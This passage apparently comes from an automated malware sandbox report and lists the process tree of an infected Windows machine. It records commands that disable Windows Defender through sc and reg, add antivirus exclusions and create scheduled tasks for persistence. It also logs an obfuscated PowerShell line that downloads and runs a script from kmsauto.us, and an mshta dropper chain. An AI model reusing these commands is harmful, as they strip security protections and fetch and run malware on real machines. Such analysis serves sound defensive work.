- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:18924
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:19824
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:20308
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:7564
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:16540
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:13604
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:18212
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:18588
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:12784
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:14960
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:14124
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:19144
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:11828
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:11252
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:20732
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:21276
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:20684
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:20956
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:20468
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:19568
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:15272
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:21888
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:23120
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:21480
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:9560
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:14892
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:23172
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:22680
- - C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    C:\Users\Admin\Documents\AUCcg4JaWZdP0U0bFGmyJ373.exe
    3⤵
    PID:19236
- C:\Users\Admin\Documents\Pq1or0IwINY9mydxS_vPWac8.exe
  "C:\Users\Admin\Documents\Pq1or0IwINY9mydxS_vPWac8.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  PID:3104
- - C:\Users\Admin\Documents\Pq1or0IwINY9mydxS_vPWac8.exe
    "C:\Users\Admin\Documents\Pq1or0IwINY9mydxS_vPWac8.exe"
    3⤵
    PID:5752
- - C:\Users\Admin\Documents\Pq1or0IwINY9mydxS_vPWac8.exe
    "C:\Users\Admin\Documents\Pq1or0IwINY9mydxS_vPWac8.exe"
    3⤵
    - Executes dropped EXE
    PID:1464
- C:\Users\Admin\Documents\jgs2UAwTKbisdt4bOkhAPSid.exe
  "C:\Users\Admin\Documents\jgs2UAwTKbisdt4bOkhAPSid.exe"
  2⤵
  - Executes dropped EXE
  - Windows security modification
  - Checks whether UAC is enabled
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - System policy modification
  PID:3880
- - C:\Users\Admin\AppData\Local\Temp\fb3c9bd4-85d8-4411-b2ab-5425b4ba5c09\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\fb3c9bd4-85d8-4411-b2ab-5425b4ba5c09\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\fb3c9bd4-85d8-4411-b2ab-5425b4ba5c09\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1320
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fb3c9bd4-85d8-4411-b2ab-5425b4ba5c09\test.bat"
      4⤵
      PID:2528
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\jgs2UAwTKbisdt4bOkhAPSid.exe" -Force
    3⤵
    PID:244
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\jgs2UAwTKbisdt4bOkhAPSid.exe" -Force
    3⤵
    PID:1236
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    3⤵
    PID:2528
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
    3⤵
    PID:4464
- C:\Users\Admin\Documents\Q9T1EZBqKuonPNpvLaHnXaQ8.exe
  "C:\Users\Admin\Documents\Q9T1EZBqKuonPNpvLaHnXaQ8.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5076
- - C:\Users\Admin\Documents\Q9T1EZBqKuonPNpvLaHnXaQ8.exe
    "C:\Users\Admin\Documents\Q9T1EZBqKuonPNpvLaHnXaQ8.exe"
    3⤵
    PID:6392
- C:\Users\Admin\Documents\tg3veUgegjgRzAPmWxCKK1bf.exe
  "C:\Users\Admin\Documents\tg3veUgegjgRzAPmWxCKK1bf.exe"
  2⤵
  - Executes dropped EXE
  PID:5084
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 312
    3⤵
    - Program crash
    PID:2384
- C:\Users\Admin\Documents\Jmpyax2pCVTdmC6SwBiLxwIY.exe
  "C:\Users\Admin\Documents\Jmpyax2pCVTdmC6SwBiLxwIY.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:5056
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:5108
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:344
- C:\Users\Admin\Documents\KG6spYu7ihy8cqiSpqZi7BYX.exe
  "C:\Users\Admin\Documents\KG6spYu7ihy8cqiSpqZi7BYX.exe"
  2⤵
  PID:5044
- C:\Users\Admin\Documents\XhX0pd4ZWjgV5kfhmXqGc3_7.exe
  "C:\Users\Admin\Documents\XhX0pd4ZWjgV5kfhmXqGc3_7.exe"
  2⤵
  - Executes dropped EXE
  PID:3680
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3680 -s 240
    3⤵
    - Program crash
    PID:2236
- C:\Users\Admin\Documents\RHhV6LKxJoo1M2YBl_dl3nwL.exe
  "C:\Users\Admin\Documents\RHhV6LKxJoo1M2YBl_dl3nwL.exe"
  2⤵
  - Executes dropped EXE
  PID:3980
- C:\Users\Admin\Documents\Cw5uTwG_Z0OKOiqdYnzd4yUH.exe
  "C:\Users\Admin\Documents\Cw5uTwG_Z0OKOiqdYnzd4yUH.exe"
  2⤵
  - Executes dropped EXE
  PID:4044
- C:\Users\Admin\Documents\_61tyeSDJI0ddJYWKwIw2xdn.exe
  "C:\Users\Admin\Documents\_61tyeSDJI0ddJYWKwIw2xdn.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:4012
- C:\Users\Admin\Documents\xBepK34H5NkvqxDMPFwzSjV4.exe
  "C:\Users\Admin\Documents\xBepK34H5NkvqxDMPFwzSjV4.exe"
  2⤵
  - Executes dropped EXE
  PID:4192
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 244
    3⤵
    - Program crash
    PID:5720
- C:\Users\Admin\Documents\YzRM8xR8i134nocoOLQ9rJhx.exe
  "C:\Users\Admin\Documents\YzRM8xR8i134nocoOLQ9rJhx.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3856
- - C:\Users\Admin\Documents\YzRM8xR8i134nocoOLQ9rJhx.exe
    "C:\Users\Admin\Documents\YzRM8xR8i134nocoOLQ9rJhx.exe"
    3⤵
    - Executes dropped EXE
    PID:1216
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2116
- C:\Users\Admin\Documents\5IPZDnUT3Di62uwigNi4zRyC.exe
  "C:\Users\Admin\Documents\5IPZDnUT3Di62uwigNi4zRyC.exe"
  2⤵
  - Executes dropped EXE
  PID:3568
- - C:\Users\Admin\AppData\Local\Temp\bvC1TDJW.com
    "C:\Users\Admin\AppData\Local\Temp\bvC1TDJW.com"
    3⤵
    - Executes dropped EXE
    PID:2812
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F91.tmp\F92.tmp\F93.bat C:\Users\Admin\AppData\Local\Temp\bvC1TDJW.com"
      4⤵
      PID:5096
    - - C:\Windows\system32\sc.exe
        
        sc config WinDefend start=disabled
        5⤵
        
        PID:2940
    - - C:\Windows\system32\sc.exe
        
        sc config SecurityHealthService start=disabled
        5⤵
        
        PID:5620
    - - C:\Windows\system32\sc.exe
        
        sc config Sense start=disabled
        5⤵
        
        PID:2116
    - - C:\Windows\system32\sc.exe
        
        sc config WdNisDrv start=disabled
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:3388
    - - C:\Windows\system32\sc.exe
        
        sc config WdNisSvc start=disabled
        5⤵
        
        PID:6080
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
        5⤵
        
        PID:5236
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:5820
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:5400
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:5220
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:7000
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:6256
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:6856
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:6164
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:6704
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:6688
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:4732
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:4388
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:2020
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:3992
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:4884
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
        5⤵
        Executes dropped EXE
        
        PID:2600
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI" | find /i "SecHealthUI"
        5⤵
        
        PID:6396
      - C:\Windows\system32\find.exe
        
        find /i "SecHealthUI"
        6⤵
        
        PID:7336
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI"
        6⤵
        
        PID:7328
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\Microsoft.SecHealthUI_1000.22000.1.0_neutral__8wekyb3d8bbwe" /f
        5⤵
        
        PID:7432
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\S-1-5-21-257790753-2419383948-818201544-1000\Microsoft.SecHealthUI_1000.22000.1.0_neutral__8wekyb3d8bbwe" /f
        5⤵
        
        PID:7788
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\PackageState\S-1-5-21-257790753-2419383948-818201544-1000\Microsoft.SecHealthUI_8wekyb3d8bbwe" /f
        5⤵
        
        PID:4852
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility
        5⤵
        
        PID:8076
- - C:\Users\Admin\AppData\Local\Temp\ihy8RTYf.com
    "C:\Users\Admin\AppData\Local\Temp\ihy8RTYf.com"
    3⤵
    - Executes dropped EXE
    PID:4792
  - - C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://kmsauto.us/ra/Encoding.txt
      4⤵
      Blocklisted process makes network request
      PID:5356
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ra/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X
        5⤵
        
        PID:3088
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        #cmd
        6⤵
        
        PID:5948
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3088 -s 2648
        6⤵
        Program crash
        
        PID:440
- - C:\Users\Admin\AppData\Local\Temp\O2kr7h9k.com
    "C:\Users\Admin\AppData\Local\Temp\O2kr7h9k.com"
    3⤵
    - Executes dropped EXE
    PID:3444
  - - C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://kmsauto.us/Encoding.txt
      4⤵
      Blocklisted process makes network request
      PID:5896
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X
        5⤵
        
        PID:5124
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5232
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        #cmd
        6⤵
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:2236
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5124 -s 2028
        6⤵
        Program crash
        
        PID:5736
- C:\Users\Admin\Documents\16QTEWdD9figyW5hYN5RXwhv.exe
  "C:\Users\Admin\Documents\16QTEWdD9figyW5hYN5RXwhv.exe"
  2⤵
  PID:3388
- - C:\Program Files (x86)\Company\NewProduct\cutm3.exe
    "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
    3⤵
    - Executes dropped EXE
    PID:4996
- - C:\Program Files (x86)\Company\NewProduct\inst1.exe
    "C:\Program Files (x86)\Company\NewProduct\inst1.exe"
    3⤵
    - Executes dropped EXE
    PID:3316
- - C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
    3⤵
    - Executes dropped EXE
    PID:1268
- C:\Users\Admin\Documents\fX28m8WxoU8fTPIG5y55wnx5.exe
  "C:\Users\Admin\Documents\fX28m8WxoU8fTPIG5y55wnx5.exe"
  2⤵
  - Executes dropped EXE
  PID:4848
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" VBSCripT: CloSe ( CReateOBjecT ("wSCRipT.sheLl"). RUN ( "cmD /q /C TYPe ""C:\Users\Admin\Documents\fX28m8WxoU8fTPIG5y55wnx5.exe"" > Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF """" == """" for %Q in ( ""C:\Users\Admin\Documents\fX28m8WxoU8fTPIG5y55wnx5.exe"" ) do taskkill -F -im ""%~NxQ"" ", 0, truE) )
    3⤵
    PID:4804
- C:\Users\Admin\Documents\OzOEgtJufHeD46NfISC_8JM8.exe
  "C:\Users\Admin\Documents\OzOEgtJufHeD46NfISC_8JM8.exe"
  2⤵
  - Executes dropped EXE
  PID:1560
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1560 -s 232
    3⤵
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:5972
- C:\Users\Admin\Documents\nPNySvKypsAzH2kMtfUxg1D3.exe
  "C:\Users\Admin\Documents\nPNySvKypsAzH2kMtfUxg1D3.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:1008
- C:\Users\Admin\Documents\ipTF4oUrUlVTZdQrMXjaNy9Z.exe
  "C:\Users\Admin\Documents\ipTF4oUrUlVTZdQrMXjaNy9Z.exe"
  2⤵
  - Executes dropped EXE
  PID:444
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 444 -s 240
    3⤵
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:6320
- C:\Users\Admin\Documents\XVQcl48qi57AkPAiOr4LXOl0.exe
  "C:\Users\Admin\Documents\XVQcl48qi57AkPAiOr4LXOl0.exe"
  2⤵
  - Executes dropped EXE
  PID:2208
- C:\Users\Admin\Documents\m13bu963xCMLkCNMPVg9OIUu.exe
  "C:\Users\Admin\Documents\m13bu963xCMLkCNMPVg9OIUu.exe"
  2⤵
  PID:2600
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\M13BU9~1.DLL,s C:\Users\Admin\DOCUME~1\M13BU9~1.EXE
    3⤵
    PID:5332
  - - C:\Windows\SysWOW64\RUNDLL32.EXE
      C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\M13BU9~1.DLL,ZEsZNmtHbzla
      4⤵
      PID:7500
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\M13BU9~1.DLL
        5⤵
        
        PID:2288
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp1E72.tmp.ps1"
        5⤵
        Checks BIOS information in registry
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4044
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp965F.tmp.ps1"
        5⤵
        
        PID:6136
      - C:\Windows\SysWOW64\nslookup.exe
        
        "C:\Windows\system32\nslookup.exe" -type=any localhost
        6⤵
        
        PID:8612
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask
        5⤵
        
        PID:2532
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask
        5⤵
        
        PID:8040
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5332 -s 848
      4⤵
      Program crash
      PID:2112

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
- Executes dropped EXE
PID:5044

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /C TYPe "C:\Users\Admin\Documents\fX28m8WxoU8fTPIG5y55wnx5.exe" >Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF "" == "" for %Q in ("C:\Users\Admin\Documents\fX28m8WxoU8fTPIG5y55wnx5.exe" ) do taskkill -F -im "%~NxQ"
1⤵
PID:1172
- C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE
  BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1
  2⤵
  - Executes dropped EXE
  PID:4820
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" VBSCripT: CloSe ( CReateOBjecT ("wSCRipT.sheLl"). RUN ( "cmD /q /C TYPe ""C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE"" > Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF ""-PyTJSIPDC12bsxp0f1 "" == """" for %Q in ( ""C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE"" ) do taskkill -F -im ""%~NxQ"" ", 0, truE) )
    3⤵
    PID:5460
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /q /C TYPe "C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE" >Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF "-PyTJSIPDC12bsxp0f1 " == "" for %Q in ("C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE" ) do taskkill -F -im "%~NxQ"
      4⤵
      PID:4048
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" .\BPJm7xC.Iwa,Rgac
    3⤵
    - Loads dropped DLL
    PID:5932
- C:\Windows\SysWOW64\taskkill.exe
  taskkill -F -im "fX28m8WxoU8fTPIG5y55wnx5.exe"
  2⤵
  - Kills process with taskkill
  PID:5232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
PID:1832

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:2276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5084 -ip 5084
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4372

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
- Modifies data under HKEY_USERS
PID:1500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4856 -ip 4856
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3348 -ip 3348
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:912

C:\Windows\SysWOW64\WerFault.exe
